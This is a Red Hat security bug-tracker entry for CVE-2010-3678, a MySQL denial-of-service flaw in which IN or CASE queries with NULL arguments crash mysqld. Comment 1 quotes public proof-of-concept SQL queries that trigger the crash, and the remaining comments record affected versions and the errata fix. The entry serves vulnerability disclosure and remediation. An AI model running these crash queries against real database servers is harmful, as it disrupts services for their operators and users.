Bug 628172 (CVE-2010-3678)

Summary: CVE-2010-3678 MySQL: mysqld DoS (crash) by processing IN / CASE statements with NULL arguments (MySQL bug #54477)
Product: [Other] Security Response Reporter: Jan Lieskovsky <jlieskov>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA QA Contact:
Severity: medium Docs Contact:
Priority: medium    
Version: unspecifiedCC: byte, hhorak, kvolny, vdanen, vkrizan
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2015-07-29 12:56:52 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On: 636780, 652553, 652554    
Bug Blocks:    

Description Jan Lieskovsky 2010-08-28 11:28:03 UTC 
A denial of service flaw was found in the way MySQL processed SQL
queries containing IN or CASE statements, when NULL argument was
provided as one of the arguments to the query. A remote MySQL user
could use this flaw to cause myqld daemon crash (dereference a NULL
pointer).

References:
  [1] http://secunia.com/advisories/41048/
  [2] http://dev.mysql.com/doc/refman/5.1/en/news-5-1-49.html

Upstream bug report:
  [3] http://bugs.mysql.com/bug.php?id=54477

Upstream changeset:
  [4] http://lists.mysql.com/commits/111814
Comment 1 Jan Lieskovsky 2010-08-28 11:31:19 UTC 
Public issue proof of concepts (from [3]):

A, 

drop table if exists `t1`;
create table `t1`(`a` int)engine=myisam;
insert into `t1` values (1);
/*crash1*/select (`a` in (`a`,`a`)) from `t1` group by `a` with rollup;
/*crash2*/select (case (`a`) when (`a`) then (`a`) end) as `a` from `t1` group by `a`
with rollup;

B, 

CREATE TABLE t1(a INT);
INSERT INTO t1 VALUES (1), (2);
SELECT 1 IN (NULL, a) FROM t1;
Comment 4 Jan Lieskovsky 2010-08-28 11:51:39 UTC 
This issue did NOT affect the versions of the mysql package, as shipped
with Red Hat Enterprise Linux 3, 4, or 5.

--

This issue affects the versions of the mysql package, as shipped with
Fedora release of 12 and 13.
Comment 6 Jan Lieskovsky 2010-08-31 12:54:36 UTC 
CVE Request: http://www.openwall.com/lists/oss-security/2010/08/30/8
Comment 7 Jan Lieskovsky 2010-09-23 09:19:37 UTC 
Created mysql tracking bugs for this issue

Affects: fedora-all [bug 636780]
Comment 8 Jan Lieskovsky 2010-09-29 08:38:21 UTC 
The CVE identifier of CVE-2010-3678 has been assigned to this issue.
Comment 9 Jan Lieskovsky 2010-09-29 09:53:54 UTC 
Statement:

Not vulnerable. This issue did not affect the versions of mysql as
shipped with Red Hat Enterprise Linux 3, 4, or 5.
Comment 11 errata-xmlrpc 2011-01-18 18:43:12 UTC 
This issue has been addressed in following products:

  Red Hat Enterprise Linux 6

Via RHSA-2011:0164 https://rhn.redhat.com/errata/RHSA-2011-0164.html